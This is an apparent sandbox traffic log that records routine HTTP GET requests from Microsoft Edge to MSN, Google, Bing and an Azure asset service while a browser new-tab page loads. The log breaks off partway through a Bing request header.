Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/card-actions-wc.8a1bb7315d1f3ad1dac6.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_js.6985524dca6d732452d7.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/diagnostic-web-vitals.c6eb8c640456acb68b9c.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/ocvFeedback.2a930d83a1ebb2ea4b2d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.75/asset?sv=2017-07-29&sr=c&sig=R83mlHRCqeHRG9T0loza5cz3U8zjuZzQy2wVvoSHGHw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-06-30T00%3A00%3A00Z&sp=r&assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/conditionalBannerWC.6d8019b2ba4ee047b8c5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-settings-edgenext.36872f7c5ce57a5d9c49.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/codex-bing-chat.d4705abeab944b647de2.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/super-coach-mark-wc.5ad8de935d24e6052658.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/waffle-wc.74c10742f08f983c2805.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-segments.11aff16404408a58d3d2.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/cs-core-desktop_card-components_dist_card-banner_index_js-cs-core-desktop_card-components_dis-cef191.888669d9cc0659b01a27.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_core_dist_interaction-tracker_MouseTracker_js-libs_weather-shared-wc_dist_utilities_entr-072035.11606a415b7b5f44447f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/welcomeGreetingLight.879b176ee540781e4e35.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_social-data-service_dist_service_SocialService_js.6a2e3b2d7b9c8b7b2133.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/notification-bell-wc.dd601018956dbb3a4fb7.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/feedback.3220005356a33ce0ca94.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/na-trending.e1c8353f6c85262a7e58.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/superBreakingNews.b103d390df46602376d8.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/weather-one-liner.48b10cbc534ebb1a7fad.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/digest-card.7224d7f5906215f25e3c.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/toast-wc.6cd4b923cfe7c0d8b058.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/ms-rewards-wc.9abca88189e342bde963.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /breakingnews/v1/cms/api/amp/article/AA157JY HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/sign-in-control-wc.ce912a6f76a1497532ac.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /staticsb/statics/latest/common/icons/copilot_color.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/feedDependencies.6629e7599f3739138e10.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/mobile-app-upsell.b15413e73bafe92e0855.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_location-service_dist_AutoSuggestService_index_js-libs_location-service_dist_profiles_We-d085cf.36490bde8dc8dec85933.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/weather-card-data-connector.b0240aa589a42dc6a0bc.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bnc/notifications/count?app=anaheim&pageId=ntp HTTP/1.1Host: www.bing.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Search-UILang: en-ussec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47X-PERSONALBING-FLIGHTS: msnallexpusers,prg-sp-liveapi,prg-cg-homepagec,premms-sc-sc_roer3,prg-c-arb-rsz,1s-wpo-vsocc,prg-sriver-wpo,ads-prec-fix,sid-finalval,sidamo-flr-stage-2,preshp-xap-prod,prg-1sw-sa-annquota14,prg-1sw-sageimterav3i2c,prg-1sw-sacfxevery2-t1,prg-1sw-sa-distillation4-t1,prg-1sw-saerevrfcc,traffic-1sw-sim,prg-1sw-sim-adapt,prg-cg-ntv-ad-blnd,prg-1sw-p1widinc-2d,1s-wpo-pr1-3colnodem,prg-1sw-p1widinc,1s-tpsn-wapiprg-t,1s-tpsn-wapidestprg,prg-cg-featured-c,traffic-1-lkscinc-t,prg-1sw-lksincstbl,1s-aadp1dynasize,1s-p1-cgtab-r1hp,prg-fin-cdicon,prg-fin-l2tnews1,prg-fin-l2tnews,btrecenus,iframeflex,prg-adspeek,prg-fin-errde,1s-winauthservice,flight0417cf_4,prg-rfrcsmc,prg-pr2-flashrev,btie-fancy-img-c,prg-ad-ai-imgf-c,1s-fcrypt,prg-cookiecont,prg-ctr-pnpc,prg-entpremier-pr2-c,1s-prealgo855,1s-xapentprong2,prg-p2-prmft,prg-pr2-entprem-c,1s-ntf2-exdrc,1s-ntf2-exdr,1s-ntf2-marf5,1s-wpo-pr2-dpucd5,prg-pr2-noreqcap,prg-upsaip-w1-t,prg-upsaip-r-t,prg-vidbuf1,1s-rpssecautht,1s-shp-rc-tc-rmsanc,jj_fac_t,traffic-pr2-cmsev-c,1s-tpsn-wapiprg2-t,1s-tpsn-wapidestprg2,prg-cg-cmga,prg-cg-cmgroupa,prg-pr2-svganimac,prg-ad-pdedupe-c,prg-unified-p2,1s-p2-promotedondmd,1s-wpo-pr2-promad,prg-2unified-uc-t,1s-wpo-pr2-sdcginrailt3c,1s-wpo-prg2-ioctrl,1s-wpo-pr2-fsearch,1s-defaultscn,prg-1sw-pde0,1s-defaultscnw,prg-csacclink-c,1s-notifmapping,1s-shp-rc-t-v7np350,1s-shp-rc-t2-v7_2addneg,1s-shp-rc-t3-v7np350,1s-shp-rc-te-v7_2addneg,prg-sh-lowinv1,prg-sh-lowinv,prg-1sw-srdus,prg-cg-notf2,prg-cg-notf,prg-sh-dealsdaypdp,1s-xapbnze,prg-sh-rmitmlnk,nopinglancecardit,prg-chnl-umf-follow,prg-cg-ingames-ct,prg-sh-recopdp,prg-sh-bd-newbanner,mktautosqor,prg-1sw-rr2fn,prg-1sw-rr2fp,prg-strrtng-g1,prg-cg-c-hb,prg-ugc-likechange,prg-1sw-wxmptreplace,prg-1s-wpocfpc,ads-oshkpstgt-c,prg-pr2-sidebar-5-t,1s-sl-halfucards,prg-pr2-pagecontext,prg-pr2-shoreline,prg-pr2-sidebar,prg-sh-bd-newchckot,prg-sh-bd-nwchk,msph-tdinmsph,prg-sh-bd-disgb-c,msph-feedinternal,nonmobile-t,revprmres,1s-temp-wid-t,prg-1s-twid,msph-onboardconfig,hp-bot-seo,prg-1sw-iconmap,1s-uasdisf-t,prg-wx-ncar,1s-user-ctrl-rotc1,ads-usepme-c,prg-1sw-finvldc,prg-rpt2,prg-cg-dom-cleac,0age5412,ads-anjson-migt,1s-servicetelemetry,sh-bdvid,prg-sh-bd-video,fv-channel-stagc,prg-1s-sm-workid,prg-1s-workid,vws-chpgv2-lgtn,prg-chpg-ldgw,msph-contoverview,msph-mergedfeedapi,ads-sharvia-migr,msph-aiacselect,1s-blis-followloc,1s-wpo-ntp-hero-t,msph-mngcontrep,msph-c2scontrep,msph-newrsvideo,prg-1s-mm-wid-t,cswea-ovwntout,prg-1sw-iplsdp2,prg-1sw-iplsdp1,prg-1sw-iplsd-ntp,prg-1sw-iplsdc1p2,prg-1sw-iplsdc-ntp,prg-whp-minil1,prg-1sw-popularc,prg-ad-va-rf-c,prg-
